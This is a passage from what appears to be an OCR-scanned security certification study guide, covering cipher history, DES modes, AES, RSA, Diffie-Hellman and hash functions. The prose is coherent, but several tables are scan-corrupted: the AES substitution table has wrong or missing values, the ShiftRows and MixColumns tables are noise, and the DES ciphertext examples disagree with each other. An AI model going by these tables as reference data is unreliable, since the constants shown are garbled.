Leon Battista Alberti, an Italian architect and Renaissance man, invented the 
cipher disk in 1466 or 1467. The disks were made of copper, with two concentric 
alphabets. In addition to inventing the cipher disk, Alberti is considered the inventor 
of the polyalphabetic cipher: he began with a static offset, but turned the disks after 
each few words were encrypted. 

Cipher disks were used for hundreds of years; they were commonly used through 
the time of the U.S. Civil war. Figure 4.20 shows original brass cipher disks used by 
the Confederate States of America. 

JEFFERSON DISKS 

Thomas Jefferson created Jefferson Disks in the 1790s. Jefferson called his invention 
the “Wheel Cypher;” it had 36 wooden disks, each with 26 letters in random order 
(“jumbled and without order,” according to Jefferson [18]) along the edge, like the 
ridges of a coin. The device, shown in Figure 4.21, was used briefly and then forgot- 
ten. Cipher wheels were later independently invented. Jefferson’s papers describing 
his “cypher” were rediscovered in 1922. 

To encrypt a message with Jefferson Disks, you must first create an identical set 
of disks and securely send one to the party you wish to communicate with. Then 
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FIGURE 4.20 Confederate States of America Cipher Disks 


Courtesy of the National Security Agency 



FIGURE 4.21 Jefferson Disks 


Courtesy of the National Security Agency 


arrange the first 36 letters of plaintext along one line of letters on the disks. Then 
pick any other line of “jumbled” letters: this is the ciphertext. Continue this process 
for each 36 letters of plaintext. 

To decrypt, the recipient arranges the ciphertext along one line of the disks. Then 
the recipient scans the other 25 lines, looking for one that makes sense (the rest will 
be a jumble of letters, in all likelihood). 

David Kahn, in his seminal history of cryptography called The Codebreakers, 
stated that the Jefferson Disk was the most advanced cryptographic device of its time 
and called Thomas Jefferson “the Father of American Cryptography.” [19] 
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BOOK CIPHER AND RUNNING-KEY CIPHER 

The book cipher and running-key cipher both use well-known texts as the basis for 
keys. 

A book cipher uses whole words from a well-known text such as a dictionary. 
To encode, agree on a text source, and note the page number, line, and word offset 
of each word you would like to encode. Benedict Arnold used a book cipher to com- 
municate with British conspirators. 

Arnold and British army officer John Andre agreed to use Nathan Bailey’s Uni- 
versal Etymological English Dictionary to encode and decode messages. Here is a 
sample of ciphertext sent from Arnold to Andre on July 12, 1780: “As 158.9.25 and 
115.9.12 are 226.9.3'd by./236.8.20ing 131.9.21, 163.9.6...” The ciphertext means 
“As <word on page 158, column 9, offset 25> and <word on page 115, column 9, 
offset 12 > ...” etc. This translates into “As Life and fortune are risked by serving 
His Majesty...” [20] 

Running-key ciphers also use well-known texts as the basis for their keys: instead 
of using whole words, they use modulus math to “add” letters to each other. As- 
sume a conspirator wishes to send the message “ATTACK AT DAWN” to a fellow 
conspirator. They have agreed to use the Preamble of the United States Constitution 
(“We the People of the United States, in Order to form a more perfect Union. . .”) as 
their running key. Table 4.8 shows the resulting ciphertext. 

C0DEB00KS 

Codebooks assign a code word for important people, locations, and terms. One 
example is the Cipher for Telegraphic Correspondence , which was used by Union 
General Joseph Hooker during the United States Civil War. Each word in the code- 
book has two codenames. As shown in Figure 4.22, the president was “Adam” or 
“Asia,” the Secretary of State was “Abel” or “Austria,” etc. 

ONE-TIME PAD 

A one-time pad uses identical paired pads of random characters, with a set amount 
of characters per page. Assume a pair of identical 100-page one-time pads with 


Table 4.8 Running Key Ciphertext of “ATTACK AT DAWN” 
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C 
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FIGURE 4.22 Cipher for Telegraphic Correspondence 

Courtesy of the National Security Agency 

1000 random characters per page. Once the identical pair of pads is created, they 
are securely given to two groups or individuals who wish to communicate securely. 

Once the pads are securely distributed, either side may communicate by using the 
first page of the pad to encrypt up to 1000 characters of plaintext. The encryption is 
done with modular addition (as we saw previously, “Y” + “C” = “B”). The message 
is then sent to the receiver, who references the same page of the pad to decrypt via 
modular subtraction (“B” - “C” = “Y”). Once a page of the pad is used, it is dis- 
carded and never used again. 

The one-time pad is the only encryption method that is mathematically proven 
to be secure, if the following three conditions are met: the characters on the pad are 
truly random, the pads are kept secure, and no page is ever reused. 

Vernam Cipher 

The first known use of a one-time pad was the Vernam Cipher, named after 
Gilbert Vernam, an employee of AT&T Bell Laboratories. In 1917 he invented a 
teletypewriter (capable of transmitting teletypes via phone lines) that encrypted and 
decrypted using paper rolls of tape containing the encryption key. Originally the keys 
were reused; the system began using a one-time pad (pairs of identical tapes with 
random keys that were never reused) in the 1920s. 

The Vernam cipher used bits (before the dawn of computers, as other teletypes 
also did). The one-time pad bits were XORed to the plaintext bits. 

Project VENONA 

VENONA was the project undertaken by United States and United Kingdom crypt- 
analysts to break the KGB’s (the Soviet Union’s national security agency) encryp- 
tion in the 1940s. 
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The KGB used one-time pads for sensitive transmissions, which should have 
rendered the ciphertext unbreakable. The KGB violated one of the three rules of 
one-time pads: they reused the pads. This allowed the U.S. and U.K. cryptanalysts 
to break many of the transmissions, providing critical intelligence. Many famous 
names were decrypted, including details on the nuclear espionage committed by 
Ethel and Julius Rosenberg. 


NOTE 

Project VENONA itself is not testable; it is described to show the dangers of reusing the pages of a 
one-time pad. 


HEBERN MACHINES AND PURPLE 

Hebern Machines are a class of cryptographic devices known as rotor machines, 
named after Edward Hebern. Figure 4.23 shows an original Hebern Electric Code 
Machine. They look like large manual typewriters, electrified with rotors (rotating 
motors). These devices were used after World War I, through World War II, and in 
some cases into the 1950s. 

Enigma 

Enigma was used by German Axis powers during World War II. The initial cryptanaly- 
sis of Enigma was performed by French and Polish cryptanalysts; the British, led by 



Courtesy of the National Security Agency 
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FIGURE 4.24 A Young Cryptographer using Enigma at the National Cryptologic Museum 

Courtesy of the National Security Agency 

Alan Turing in Bletchley Park, England, continued the work. The intelligence provided 
by the cryptanalysis of Enigma (called Ultra) proved critical in the European theater of 
World War II. British cryptanalyst Sir Harry Hinsley said, “the war, instead of finish- 
ing in 1945, would have ended in 1948 had the Government Code and Cypher School 
not been able to read the Enigma ciphers and produce the Ultra intelligence.” [21] 
Enigma, shown in Figure 4.24, looks like a large typewriter with lamps and finger 
wheels added. The military version of Enigma (commercial versions also existed) 
had three finger wheels that could be set to any number from 1 to 26 (the finger 
wheels provide the key). As you type on the keyboard, the finger wheels turn, and a 
lamp for the corresponding ciphertext illuminates. To decrypt, set the finger wheels 
back to their original position, and type the ciphertext into the keyboard. The lamps 
illuminate to show the corresponding plaintext. 

SIGABA 

SIGABA was a rotor machine used by the United States through World War II into the 
1950s. While similar to other rotor machines such as Enigma, it was more complex, 
based on analysis of weaknesses in Enigma by American cryptanalysts including Wil- 
liam Friedman. SIGABA was also called ECM (Electronic Code Machine) Mark II. 

SIGABA, shown in Figure 4.25, was large, complex, and heavy: far heavier and 
cumbersome than Enigma. As a result, it saw limited field use. SIGABA was never 
known to be broken. 

Purple 

Purple is the Allied name for the encryption device used by Japanese Axis powers 
during World War II. While many sources describe Purple as a rotor machine from 
the same era, such as Enigma and American SIGABA, it is actually a stepping-switch 
device, primarily built with phone switch hardware. Other models included Red and 
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FIGURE 4.25 SIGABA 


Courtesy of the National Security Agency 



Courtesy of the National Security Agency 


Jade. Figure 4.26 shows a fragment of a Purple machine recovered from the Japanese 
Embassy in Berlin at the end of World War II. 

While Alan Turing led the British cryptanalysis of Enigma, senior cryptanalyst 
William Friedman led the United States effort against Purple. The Japanese Axis 
powers took Japanese plaintext, added code words, and then encrypted with Purple. 
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The U.S. challenge was threefold: decrypt, translate the code words, and then trans- 
late Japanese to English. 

In 1942, the Allies decoded Purple transmissions referencing a planned sneak 
attack on “AF.” The Allies believed AF was a code word for Midway Island, but 
they wanted to be sure. They sent a bogus message, weakly encoded, stating there 
was a water problem on Midway Island. Two days later the Allies decrypted a Purple 
transmission stating there was a water problem on AF. 

The Allies knew where and when the “sneak” attack would be launched, and they 
were ready. The Battle of Midway Island provided a decisive victory for the Allies, 
turning the tide of war in the Pacific theater. 

CRYPTOGRAPHY LAWS 

The importance of cryptography was not lost on many governments, especially the 
United States. Intelligence derived from cryptanalysis was arguably as powerful as 
any bomb. This lead to attempts to control cryptography through the same laws used 
to control bombs: munitions laws. 

C0C0M 

COCOM is the Coordinating Committee for Multilateral Export Controls, which was 
in effect from 1947 to 1994. It was designed to control the export of critical technolo- 
gies (including cryptography) to “Iron Curtain” countries during the cold war. 

Charter COCOM members included the United States and a number of European 
countries. Later Japan, Australia, Turkey, and much of the rest of the non-Soviet- 
controlled countries in Europe joined. Export of encryption by members to non- 
COCOM countries was heavily restricted. 

Wassenaar Arrangement 

After COCOM ended, the Wassenaar Arrangement was created in 1996. It features 
many more countries, including former Soviet Union countries such as Estonia, the 
Russian Federation, Ukraine, and others. The Wassenaar Arrangement also relaxed 
many of the restrictions on exporting cryptography. 


TYPES OF CRYPTOGRAPHY 

There are three primary types of modern encryption: symmetric, asymmetric, and 
hashing. Symmetric encryption uses one key: the same key encrypts and decrypts. 
Asymmetric cryptography uses two keys: if you encrypt with one key, you may 
decrypt with the other. Hashing is a one-way cryptographic transformation using an 
algorithm (and no key). 

SYMMETRIC ENCRYPTION 

Symmetric encryption uses one key to encrypt and decrypt. If you encrypt a zip file, 
and then decrypt with the same key, you are using symmetric encryption. Symmetric 
encryption is also called “Secret key” encryption: the key must be kept secret from 
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third parties. Strengths include speed and cryptographic strength per bit of key. The 
major weakness is that the key must be securely shared before two parties may com- 
municate securely. Symmetric keys are often shared via an out-of-band method, such 
as via face-to-face discussion. 

The key is usually converted into a subkey, which changes for each block of data 
that is encrypted. 

Stream and Block Ciphers 

Symmetric encryption may have stream and block modes. Stream mode means each 
bit is independently encrypted in a “stream.” Block mode ciphers encrypt blocks of 
data each round: 64 bits for the Data Encryption Standard (DES), and 128 bits for 
AES, for example. Some block ciphers can emulate stream ciphers by setting the 
block size to 1 bit; they are still considered block ciphers. 

Initialization Vectors and Chaining 

An initialization vector is used in some symmetric ciphers to ensure that the first 
encrypted block of data is random. This ensures that identical plaintexts encrypt to 
different ciphertexts. Also, as Bruce Schneier notes in Applied Cryptography, “Even 
worse, two messages that begin the same will encrypt the same way up to the first 
difference. Some messages have a common header: a letterhead, or a ‘From’ line, or 
whatever.” [22 ] Initialization vectors solve this problem. 

Chaining (called feedback in stream modes) seeds the previous encrypted block 
into the next block to be encrypted. This destroys patterns in the resulting ciphertext. 
DES Electronic Code Book mode (see below) does not use an initialization vector or 
chaining and patterns can be clearly visible in the resulting ciphertext. 

DES 

DES is the Data Encryption Standard, which describes the Data Encryption Algo- 
rithm (DEA). DES was made a United States federal standard symmetric cipher in 
1976. It was created due to a lack of cryptographic standards: vendors used propri- 
etary ciphers of unknown strengths that did not interoperate with other vendor’s 
ciphers. IBM designed DES, based on their older Lucifer symmetric cipher. It uses a 
64-bit block size (meaning it encrypts 64 bits each round) and a 56-bit key. 


EXAM WARNING 


Even though “DES” is commonly referred to as an algorithm, DES is technically the name of the 
published standard that describes DEA. It may sound like splitting hairs, but that is an important 
distinction to keep in mind on the exam. “DEA” may be the best answer for a question regarding the 
algorithm itself. 


Modes of DES 

DES can use five different modes to encrypt data. The modes’ primary difference is 
block versus (emulated) stream, the use of initialization vectors, and whether errors 
in encryption will propagate to subsequent blocks. 
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The five modes of DES are: 

• Electronic Code Book (ECB) 

• Cipher Block Chaining (CBC) 

• Cipher Feedback (CFB) 

• Output Feedback (OFB) 

• Counter Mode (CTR) 

ECB is the original mode of DES. CBC, CFB, and OFB were later added in 
FIPS Publication 81 (see http://www.itl.nist.gov/fipspubs/fip81.htm). CTR mode is 
the newest mode, described in NIST Special Publication 800-38a (see: http://csrc. 
nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf). 

Electronic Code Book (ECB) 

Electronic Code Book (ECB) is the simplest and weakest form of DES. It uses no 
initialization vector or chaining. Identical plaintexts with identical keys encrypt to 
identical ciphertexts. Two plaintexts with partial identical portions (such as the header 
of a letter) encrypted with the same key will have partial identical ciphertext portions. 


NOTE 

The term “Code Book” in Electronic Code Book derives from cryptographic codebooks such as 
those used during the United States Civil War. This is also a hint to remind you of ECB’ s simplicity 
(and weakness). 


ECB may also leave plaintext patterns evident in the resulting ciphertext. Bitmap 
image data (see Figure 4.27a) encrypted with a key of “Kowalski” using 56-bit DES 
ECB mode (see Figure 4.27b) shows obvious patterns. 

Cipher Block Chaining (CBC) 

Cipher Block Chaining (CBC) mode is a block mode of DES that XORs the previous 
encrypted block of ciphertext to the next block of plaintext to be encrypted. The first 
encrypted block is an initialization vector that contains random data. This “chaining” 
destroys patterns. One limitation of CBC mode is that encryption errors will propa- 
gate: an encryption error in one block will cascade through subsequent blocks due to 
the chaining, destroying their integrity. 

Cipher Feedback (CFB) 

Cipher Feedback (CFB) mode is very similar to CBC; the primary difference is 
CFB is a stream mode. It uses feedback (the name for chaining when used in stream 
modes) to destroy patterns. Like CBC, CFB uses an initialization vector and destroys 
patterns, and errors propagate. 

Output Feedback (OFB) 

Output Feedback (OFB) mode differs from CFB in the way feedback is accom- 
plished. CFB uses the previous ciphertext for feedback. The previous ciphertext is 
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(a) Plaintext 8-bit Bitmap (BMP). Image (b) 56-bit DES ECB-Encrypted Ciphertext Bitmap 


Courtesy of the National Security Agency 

the subkey XORed to the plaintext. OFB uses the subkey before it is XORed to 
the plaintext. Since the subkey is not affected by encryption errors, errors will not 
propagate. 

Counter (CTR) 

Counter (CTR) mode is like OFB; the difference again is the feedback: CTR mode 
uses a counter. This mode shares the same advantages as OFB (patterns are destroyed 
and errors do not propagate) with an additional advantage: since the feedback can be 
as simple as an ascending number, CTR mode encryption can be done in parallel. A 
simple example would be the first block is XORed to the number 1 , the second to the 
number 2, etc. Any number of rounds can be combined in parallel this way. 
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Table 4.9 Modes of DES Summary 



Type 

Initialization Vectoi 

Error Propagation? 

Electronic Code Book (ECB) 

Block 

No 

No 

Cipher Block Chaining (CBC) 

Block 

Yes 

Yes 

Cipher Feedback (CFB) 

Stream 

Yes 

Yes 

Output Feedback (OFB) 

Stream 

Yes 

No 

Counter Mode (CTR) 

Stream 

Yes 

No 


Table 4.9 summarizes the five modes of DES. 

Single DES 

Single DES is the original implementation of DES, encrypting 64-bit blocks of data 
with a 56-bit key, using 16 rounds of encryption. The work factor required to break 
DES was reasonable in 1976, but advances in CPU speed and parallel architecture 
have made DES weak to a brute-force key attack today, where every possible key 
is generated and attempted. Massively parallel computers such as COPACOBANA 
(Cost-Optimized Parallel COde Breaker, given as a non-testable example, see: http:// 
www.copacobana.org for more information), which uses over 100 CPUs in parallel, 
can break 56-bit DES in a week or so (and faster with more CPUs), at a cost of under 
$ 10 , 000 . 

Triple DES 

Triple DES applies single DES encryption three times per block. Formally called 
the “Triple Data Encryption Algorithm (TDEA) and commonly called TDES,” it 
became a recommended standard in 1999 by the United States Federal Information 
Processing Standard (FIPS) Publication 46-3 (see: http://csrc.nist.gov/publications/ 
fips/fips46-3/fips46-3.pdf). FIPS 46-3 recommended single DES for legacy use only, 
due to the ever-lowering work factor required to break single DES. 

Triple DES has held up well after years of cryptanalysis; the primary weakness is 
that it is slow and complex compared to newer symmetric algorithms such as AES or 
Twofish. Note that “double DES” (applying DES encryption twice using two keys) is 
not used due to a meet-in-the-middle attack : see the “Cryptographic Attacks” section 
for more information. 

Triple DES Encryption Order and Keying Options 

Triple DES applies DES encryption three times per block. FIPS 46-3 describes “En- 
crypt, Decrypt, Encrypt” (EDE) order using three keying options: one, two, or three 
unique keys (called 1TDES EDE, 2TDES EDE, and 3TDES EDE, respectively). 

This order may seem confusing: why not encrypt, encrypt, encrypt, or EEE? And 
why use one through three keys? If you “decrypt” with a different key than the one 
used to encrypt, you are really encrypting further. Also, EDE with one key allows 
backwards compatibility with single DES. 

Table 4.10 shows a single DES ECB encryption of “ATTACK AT DAWN” with 
the key “Hannibal” results in ciphertext of “•AGPUA !qYY«!-” (this is the actual 
ciphertext; some bytes contain nonprintable characters). 
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Table 4.10 Single DES Encryption 


Operation 

Key 

Input 

Output 

Encrypt 

Hannibal 

ATTACK AT DAWN 

•AGPUA'qYY«! 


Table 4.11 Triple DES Encryption with One Key 


Operation 

Key 

Input 

Output 

Encrypt 

Hannibal 

ATTACK AT DAWN 

•AGPUA|qYY«! 

Decrypt 

Hannibal 

•AGPUA|qYY«| 

ATTACK AT DAWN 

Encrypt 

Hannibal 

ATTACK AT DAWN 

•AGPUA|qYY«| 


Applying triple DES EDE with the same key each time results in the same cipher- 
text as single DES . Round 3 is identical to round 1 , as shown in T able 4.11. 

2TDES EDE uses key 1 to encrypt, key 2 to “decrypt,” and key 1 to encrypt. This 
results in 112 bits of key length. It is commonly used for legacy hardware applica- 
tions with limited memory. 

3TDES EDE (three different keys) is the strongest form, with 168 bits of key 
length. The effective strength is 112 bits due to a partial meet-in-the-middle attack; 
see the Cryptographic Attacks section of this chapter for more information. 

International Data Encryption Algorithm (IDEA) 

The International Data Encryption Algorithm is a symmetric block cipher designed 
as an international replacement to DES. The IDEA algorithm is patented in many 
countries. It uses a 128-bit key and 64-bit block size. IDEA has held up to cryptanal- 
ysis; the primary drawbacks are patent encumbrance and its slow speed compared to 
newer symmetric ciphers such as AES. 

Advanced Encryption Standard (AES) 

The Advanced Encryption Standard is the current United States standard symmetric 
block cipher. It was published in Federal Information Processing Standard (FIPS) 
197 (see: http://csrc.nist.gov/publications/fips/fipsl97/fips-197.pdf). AES uses 128- 
bit (with 10 rounds of encryption), 192-bit (12 rounds of encryption), or 256-bit (14 
rounds of encryption) keys to encrypt 128-bit blocks of data. AES is an open algo- 
rithm, free to use, and free of any intellectual property restrictions. 

AES was designed to replace DES. Two- and three-key TDES EDE remain a 
FIPS-approved standard until 2030, to allow transition to AES. Single DES is not a 
current standard, and not recommended. 

Choosing AES 

The United States National Institute of Standards and Technology (NIST) solicited 
input on a replacement for DES in the Federal Register in January 1997. They 
sought a public symmetric block cipher algorithm that was more secure than DES, 
open, and fast and efficient in both hardware and software. Fifteen AES candidates 
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Table 4.12 Five AES Finalists 


Name 

Author 

MARS 

IBM 

RC6 

Rivest, Robshaw, Sidney, Yin 

Rijndael 

Daemen, Rijmen 

Serpent 

Anderson, Biham, Knudsen 

Twofish 

Schneier, Kelsey, Hall, Ferguson, Whiting, Wagner 


Table 4.13 One 128-bit Block of AES Data, Called the State 


0,0 

0,1 

0,2 

0,3 

1,0 

1,1 

1,2 

1,3 

2,0 

2,1 

2,2 

2,3 

3,0 

3,1 

3,2 

3,3 


were announced in August 1998, and the list was reduced to five in August 1999. 
Table 4.12 lists the five AES finalists. 

Rijndael was chosen and became AES. The name, pronounced “Rhine Dahl” in 
English, is a combination of the Belgian authors’ names: Vincent Rijmen and Joan 
Daemen. Rijndael was chosen “because it had the best combination of security, per- 
formance, efficiency, and flexibility.” [23] 

Table 4.13 shows the “State,” which is the block of data that is being encrypted 
via AES. Each smaller box in the State is a byte (8 bits), and there are 16 bytes (128 
bits) in each block. Data is encrypted and visualized in literal blocks. The algorithm 
that AES is based on was called “Square” for this reason. 

AES Functions 

AES has four functions: SubBytes, ShiftRows, MixColumns, and AddRoundKey. 
These functions provide confusion, diffusion, and XOR encryption to the State. 

ShiftRows 

ShiftRows provides diffusion by shifting rows of the State. It treats each row like a 
row of blocks, shifting each a different amount: 

• Row 0 is unchanged 

• Row 1 is shifted 1 to the left 

• Row 2 is shifted 2 to the left 

• Row 3 is shifted 3 to the left. 
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Table 4.14 ShiftRows, Before and After 


0,0 

0,1 

0,2 

0,3 

1,1 

1,2 

1,3 

1,0 

2,2 

2,3 

2,0 

2,1 

3,3 

3,0 

3,1 

3,2 


0,0 

0,1 

0,2 

0,3 

1,0 

1,1 

1 ,< 

73 

2,0 

A 



< 


T 3 



/l 




3 <r 



13 





Table 4.14 shows the transformation to the State. 

MixColumns 

MixColumns also provides diffusion by “mixing” the columns of the State via finite 
field mathematics, as shown in Table 4.15. 

SubBytes 

The SubBytes function provides confusion by substituting the bytes of the State. The 
bytes are substituted according to a substitution table (also called an S-Box). 

To use the table, take the byte of the State to be substituted (assume the byte is 
the letter “T”). ASCII “T” is hexadecimal byte “53.” Look up 5 on the X row and 3 
on the Y column, resulting in hexadecimal byte “ed;” this replaces “53” in the State. 
Figure 4.28 shows the AES substitution table directly from FIPS-197, with the byte 
53 lookup overlaid on top: 

AddRoundKey 

AddRoundKey is the final function applied in each round. It XORs the State with the 
subkey. The subkey is derived from the key, and is different for each round of AES. 


Table 4.15 MixColumns 


O 


CM 

CO 

c 

c 

C 

c 

£ 

E 

E 

E 

=3 

=3 

=3 

13 

O 

O 

o 

o 

o 

o 

O 

O 

X 

X 

X 

X 

2 

2 

2 

2 
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y 


0 

i 

2 

3 

4 

5 

6 

7 

8 

9 

a 

b 

c 

d 

e 

f 


0 

63 

7c 

77 

7 

0 

f 2 

6b 

6f 

c5 

30 

01 

67 

2b 

fe 

d7 

ab 

76 


1 

ca 

82 

c9 

7 

3 

fa 

59 

47 

f0 

ad 

d4 

a2 

af 

9c 

a4 

72 

cO 


2 

b7 

fd 

93 

2 


36 

3f 

fl 

CC 

34 

a5 

e5 

fi 

71 

d8 

31 

15 


3 

04 

cl 

23 

c 

3 

18 

96 

05 

9a 

07 

12 

80 

e2 

eb 

27 

b2 

75 


4 

09 

83 

2c 

1 

* 

lb 

6e 

5a 

a0 

52 

3b 

d6 

b3 

29 

e3 

2f 

84 




-l&r- 



20 

f c 

bl 

5b 

6a 

cb 

be 

39 

4a 

4c 

58 

cf 


6 

dO 

ef 

aa 

fb 

43 

4d 

33 

85 

45 

f 9 

02 

If 

50 

3c 

9f 

a8 


7 

51 

a3 

40 

8f 

92 

9d 

38 

f 5 

be 

b6 

da 

21 

10 

ff 

f 3 

d2 


8 

cd 

0c 

13 

ec 

5f 

97 

44 

17 

c4 

a7 

le 

3d 

64 

5d 

19 

73 


9 

60 

81 

4f 

dc 

22 

2a 

90 

88 

46 

ee 

b8 

14 

de 

5e 

0b 

db 


a 

eO 

32 

3a 

0a 

49 

06 

24 

5c 

c2 

d3 

ac 

62 

91 

95 

e4 

79 


b 

el 

c8 

37 

6d 

8d 

d5 

4e 

a9 

6c 

56 

f 4 

ea 

65 

7a 

ae 

08 


c 

ba 

78 

25 

2e 

lc 

a6 

b4 

c6 

e8 

dd 

74 

if 

4b 

bd 

8b 

8a 


d 

70 

3e 

b5 

66 

48 

03 

f 6 

0e 

61 

35 

57 

b9 

86 

cl 

Id 

9e 


e 

el 

f 8 

98 

11 

69 

d9 

8e 

94 

9b 

le 

87 

e9 

ce 

55 

28 

df 


f 

8c 

al 

89 

Od 

bf 

e6 

42 

68 

41 

99 

2d 

Of 

b0 

54 

bb 

16 


FIGURE 4.28 AES Substitution Table Converting Byte “53” to “eb" [24] 


Blowfish and Two fish 

Blowfish and Twofish are symmetric block ciphers created by teams led by Bruce 
Schneier, author of Applied Cryptography. Blowfish uses from 32 through 448 bit 
(the default is 128) keys to encrypt 64 bits of data. Twofish was an AES finalist, 
encrypting 128-bit blocks using 128 through 256 bit keys. Both are open algorithms, 
unpatented and freely available. 

RC5 and RC6 

RC5 and RC6 are symmetric block ciphers by RSA Laboratories. RC5 uses 32 (test- 
ing purposes), 64 (replacement for DES), or 128-bit blocks. The key size ranges from 
zero to 2040 bits. 

RC6 was an AES finalist. It is based on RC5, altered to meet the AES require- 
ments. It is also stronger than RC5, encrypting 128-bit blocks using 128-, 192-, or 
256-bit keys. 

ASYMMETRIC ENCRYPTION 

For thousands of years, cryptographic ciphers suffered from a chicken-and-egg prob- 
lem: in order to securely communicate with someone, you had to first (securely) 
share a key or device. Asymmetric encryption was a mathematical breakthrough of 
the 1970s, finally solving the age-old challenge of pre-shared keys. Asymmetric pio- 
neers include Whitfield Diffie and Martin Heilman, who created the Diffie-Hellman 
key exchange in 1976. The RSA algorithm was invented in 1977 (RSA stands for 
“Rivest, Shamir, and Adleman,” the authors’ names). 

Asymmetric encryption uses two keys: if you encrypt with one key, you may 
decrypt with the other. One key may be made public (called the public key)', asym- 
metric encryption is also called public key encryption for this reason. Anyone who 
wants to communicate with you may simply download your publicly posted public 
key and use it to encrypt their plaintext. Once encrypted, your public key cannot 
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decrypt the plaintext: only your private key can do so. As the name implies, your 
private key must be kept private and secure. 

Additionally, any message encrypted with the private key may be decrypted with 
the public key. This is typically used for digital signatures, as we will see shortly. 

Asymmetric Methods 

Math lies behind the asymmetric breakthrough. These methods use “one-way func- 
tions,” which are easy to compute “one way,” and difficult to compute in the reverse 
direction. 

Factoring Prime Numbers 

An example of a one-way function is factoring a composite number into its primes. 
A prime number is a number evenly divisible only by one and itself; a composite 
number is evenly divisible by numbers other than 1 and itself. 

Multiplying the prime number 6269 by the prime number 7883 results in 
the composite number 49,418,527. That “way” is quite easy to compute, taking 
milliseconds on a calculator. Answering the question “which prime number times 
which prime number equals 49,418,527” is much more difficult. That problem is 
called factoring, and no shortcut has been found for hundreds of years. This is the 
basis of the RSA algorithm. 

Factoring a large composite number (one thousands of bits long) is so difficult 
that the composite number can be safely publicly posted (this is the public key). The 
primes that are multiplied to create the public key must be kept private (they are the 
private key). 


EXAM WARNING 


Do not confuse “one way function” with “one way hash.” The former describes asymmetric 
algorithms; the latter describes hash algorithms. 


Discrete Logarithm 

A logarithm is the opposite of exponentiation. Computing 7 to the 13th power 
(exponentiation) is easy on a modem calculator: 96,889,010,407. Asking the question 
“96,889,010,407 is 7 to what power” (finding the logarithm) is more difficult. Discrete 
logarithms apply logarithms to groups, which is a much harder problem to solve. This 
one-way function is the basis of the Diffie-Hellman and ElGamal asymmetric algorithms. 

Diffie-Hel I man Key Agreement Protocol 

Key agreement allows two parties to securely agree on a symmetric key via a public 
channel, such as the Internet, with no prior key exchange. An attacker who is able 
to sniff the entire conversation is unable to derive the exchanged key. Whitfield Dif- 
fie and Martin Heilman created the Diffie-Hellman Key Agreement Protocol (also 
called the Diffie-Hellman Key Exchange) in 1976. Diffie-Hellman uses discrete 
logarithms to provide security. 
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Table 4.16 Symmetric vs. Asymmetric Strength [25] 


Symmetric 
Key Length 

Symmetric 

Algorithm 

Discrete Logarithm 
Equivalent Key Length 

Factoring Prime Numbers 
Equivalent Key Length 

Elliptic Curve Equivalent 
Key Length 

112 

3TDES 

2048 

2048 

224-255 

128 

AES 

3072 

3072 

256-283 

192 

AES 

7860 

7860 

384-511 

256 

AES 

15360 

15360 

512+ 


Elliptic Curve Cryptography 

ECC leverages a one-way function that uses discrete logarithms as applied to elliptic 
curves. Solving this problem is harder than solving discrete logarithms, so algorithms 
based on Elliptic Curve Cryptography (ECC) are much stronger per bit than systems 
using discrete logarithms (and also stronger than factoring prime numbers). ECC 
requires less computational resources because shorter keys can be used compared to 
other asymmetric methods. ECC is often used in lower power devices for this reason. 

Asymmetric and Symmetric Tradeoffs 

Asymmetric encryption is far slower than symmetric encryption, and is also weaker 
per bit of key length. The strength of asymmetric encryption is the ability to securely 
communicate without pre-sharing a key. 

Table 4.16 compares symmetric and asymmetric algorithms based on key length. 
Note that systems based on discrete logarithms and factoring prime numbers are far 
weaker per bit of key length than symmetric systems such as Triple DES and AES. 
Elliptic Curve fares much better in comparison, but is still twice as weak per bit 
compared to AES. 

Asymmetric and symmetric encryption are typically used together: use an asym- 
metric algorithm such as RSA to securely send someone an AES (symmetric) key. 
The symmetric key is called the session key; a new session key may be retransmitted 
periodically via RSA. 

This approach leverages the strengths of both cryptosystems. Use the slower and 
weaker asymmetric system for the one part that symmetric encryption cannot do: 
securely pre-share keys. Once shared, leverage the fast and strong symmetric encryp- 
tion to encrypt all further traffic. 

HASH FUNCTIONS 

A hash function provides encryption using an algorithm and no key. They are called 
“one-way hash functions” because there is no way to reverse the encryption. A 
variable-length plaintext is “hashed” into a fixed-length hash value (often called a 
“message digest” or simply a “hash”). Hash functions are primarily used to provide 
integrity: if the hash of a plaintext changes, the plaintext itself has changed. Com- 
mon older hash functions include Secure Hash Algorithm 1 (SHA-1), which creates 
a 160-bit hash and Message Digest 5 (MD5), which creates a 128-bit hash. Weak- 
nesses have been found in both MD5 and SHA-1; newer alternatives such as SHA-2 
are recommended. 
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Collisions 

Hashes are not unique, because the number of possible plaintexts is far larger than 
the number of possible hashes. Assume you are hashing documents that are a mega- 
bit long with MD5. Think of the documents as strings 1,000,000 bits long, and the 
MD5 hash as a string 128 bits long. The universe of potential 1,000,000-bit strings 
is clearly larger than the universe of 128-bit strings. Therefore, more than one docu- 
ment could have the same hash: this is called a collision. 

While collisions are always possible (assuming the plaintext is longer than the 
hash), they should be very difficult to find. Searching for a collision to match a spe- 
cific plaintext should not be possible to accomplish in a reasonable amount of time. 

MD5 

MD5 is the Message Digest algorithm 5, created by Ronald Rivest. It is the most wide- 
ly used of the MD family of hash algorithms. MD5 creates a 128-bit hash value based 
on any input length. MD5 has been quite popular over the years, but weaknesses have 
been discovered where collisions could be found in a practical amount of time. MD6 is 
the newest version of the MD family of hash algorithms, first published in 2008. 

Secure Hash Algorithm 

Secure Hash Algorithm is the name of a series of hash algorithms; SHA- 1 was announced 
in 1993 in the United States Federal Information Processing Standard 180 (see http:// 
www.itl.nist.gov/fipspubs/fipl80-l.htm). SHA-1 creates a 160-bit hash value. 

Like MD5, SHA-1 was also found to have weak collision avoidance. SHA-2 
was announced in 2001 (see http://csrc.nist.gov/publications/fips/fipsl80-2/fipsl80- 
2.pdf). SHA-2 includes SHA-224, SHA-256, SHA-384, and SHA-512, named after 
the length of the message digest each creates. 

While SHA-2 is recommended over SHA-1 or MD5, it is still less common due 
to its relative newness. The search for the next-generation hashing algorithm was 
announced in the Federal Register in 2007, similar to the AES competition. It was 
completed in October 2012, and SHA-3 was finalized in August 2015. Note that the 
finalization of SHA-3 is too new for the current exam, and is therefore not testable. 

HAVAL 

HAVAL (Hash of Variable Length) is a hash algorithm that creates message digests of 
128, 160, 192, 224, or 256 bits in length, using 3, 4, or 5 rounds. HAVAL uses some of 
the design principles behind the MD family of hash algorithms, and is faster than MD5. 


CRYPTOGRAPHIC ATTACKS 

Cryptographic attacks are used by cryptanalysts to recover the plaintext without the 
key. Please remember that recovering the key (sometimes called “steal the key”) 
is usually easier than breaking modern encryption. This is what law enforcement 
